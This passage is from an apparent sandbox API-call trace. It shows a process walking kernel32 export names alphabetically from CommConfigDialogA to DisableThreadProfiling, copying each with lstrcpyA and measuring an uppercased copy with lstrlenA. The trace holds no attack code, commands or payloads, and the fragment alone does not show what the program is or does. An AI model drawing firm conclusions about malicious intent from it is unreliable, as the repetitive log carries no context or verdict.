returned 18 [0083.515] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0083.515] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0083.515] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0083.515] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0083.515] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0083.515] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0083.515] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0083.515] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0083.515] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0083.515] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0083.515] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0083.515] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0083.516] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0083.516] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0083.516] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0083.516] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0083.516] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0083.516] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0083.516] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0083.516] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0083.516] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0083.516] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0083.516] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0083.516] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0083.516] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0083.516] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0083.516] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0083.516] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0083.516] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0083.516] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0083.516] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0083.516] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0083.516] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0083.516] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0083.516] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0083.516] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0083.516] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0083.516] lstrlenA (lpString="COPYCONTEXT") returned 11 [0083.516] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0083.516] lstrlenA (lpString="COPYFILEA") returned 9 [0083.516] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0083.516] lstrlenA (lpString="COPYFILEEXA") returned 11 [0083.516] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0083.516] lstrlenA (lpString="COPYFILEEXW") returned 11 [0083.516] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0083.516] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0083.516] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0083.516] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0083.517] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0083.517] lstrlenA (lpString="COPYFILEW") returned 9 [0083.517] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0083.517] lstrlenA (lpString="COPYLZFILE") returned 10 [0083.517] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0083.517] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0083.517] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0083.517] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0083.517] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0083.517] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0083.517] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0083.517] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0083.517] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0083.517] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0083.517] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0083.517] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0083.517] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0083.517] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0083.517] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0083.517] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0083.517] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0083.517] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0083.517] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0083.517] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0083.517] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0083.517] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0083.517] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0083.517] lstrlenA (lpString="CREATEEVENTA") returned 12 [0083.517] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0083.517] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0083.517] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0083.517] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0083.517] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0083.517] lstrlenA (lpString="CREATEEVENTW") returned 12 [0083.517] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0083.517] lstrlenA (lpString="CREATEFIBER") returned 11 [0083.518] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0083.518] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0083.518] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0083.518] lstrlenA (lpString="CREATEFILEA") returned 11 [0083.518] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0083.518] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0083.518] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0083.518] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0083.518] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0083.518] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0083.518] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0083.518] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0083.518] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0083.518] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0083.518] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0083.518] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0083.518] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0083.518] lstrlenA (lpString="CREATEFILEW") returned 11 [0083.518] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0083.518] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0083.518] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0083.518] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0083.518] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0083.518] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0083.518] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0083.518] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0083.518] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0083.518] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0083.518] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0083.518] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0083.518] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0083.518] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0083.518] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0083.518] lstrlenA (lpString="CREATEJOBSET") returned 12 [0083.518] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0083.518] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0083.518] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0083.519] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0083.519] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0083.519] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0083.519] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0083.519] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0083.519] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0083.519] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0083.519] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0083.519] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0083.519] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0083.519] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0083.519] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0083.519] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0083.519] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0083.519] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0083.519] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0083.519] lstrlenA (lpString="CREATEPIPE") returned 10 [0083.519] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0083.519] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0083.519] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0083.519] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0083.519] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0083.519] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0083.519] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0083.519] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0083.520] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0083.520] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0083.520] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0083.520] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0083.520] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0083.520] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0083.520] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0083.520] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0083.520] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0083.520] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0083.520] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0083.520] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0083.520] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0083.520] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0083.520] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0083.520] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0083.520] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0083.520] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0083.520] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0083.520] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0083.520] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0083.520] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0083.520] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0083.520] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0083.520] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0083.520] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0083.520] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0083.520] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0083.520] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0083.520] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0083.520] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0083.520] lstrlenA (lpString="CREATETHREAD") returned 12 [0083.520] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0083.520] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0083.520] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0083.520] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0083.521] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0083.521] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0083.521] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0083.521] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0083.521] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0083.521] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0083.521] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0083.521] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0083.521] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0083.521] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0083.521] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0083.521] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0083.521] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0083.521] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0083.521] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0083.521] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0083.521] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0083.521] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0083.521] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0083.521] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0083.521] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0083.521] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0083.521] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0083.521] lstrlenA (lpString="CTRLROUTINE") returned 11 [0083.521] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0083.521] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0083.521] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0083.521] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0083.521] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0083.521] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0083.521] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0083.521] lstrlenA (lpString="DEBUGBREAK") returned 10 [0083.521] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0083.521] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0083.521] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0083.521] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0083.521] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0083.522] lstrlenA (lpString="DECODEPOINTER") returned 13 [0083.522] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0083.522] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0083.522] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0083.522] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0083.522] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0083.522] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0083.522] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0083.522] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0083.522] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0083.522] lstrlenA (lpString="DELETEATOM") returned 10 [0083.522] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0083.522] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0083.522] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0083.522] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0083.522] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0083.522] lstrlenA (lpString="DELETEFIBER") returned 11 [0083.522] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0083.522] lstrlenA (lpString="DELETEFILEA") returned 11 [0083.522] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0083.522] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0083.522] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0083.522] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0083.522] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0083.522] lstrlenA (lpString="DELETEFILEW") returned 11 [0083.522] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0083.522] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0083.522] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0083.522] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0083.522] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0083.522] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0083.522] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0083.522] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0083.522] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0083.522] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0083.522] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0083.522] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0083.523] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0083.523] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0083.523] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0083.523] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0083.523] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: 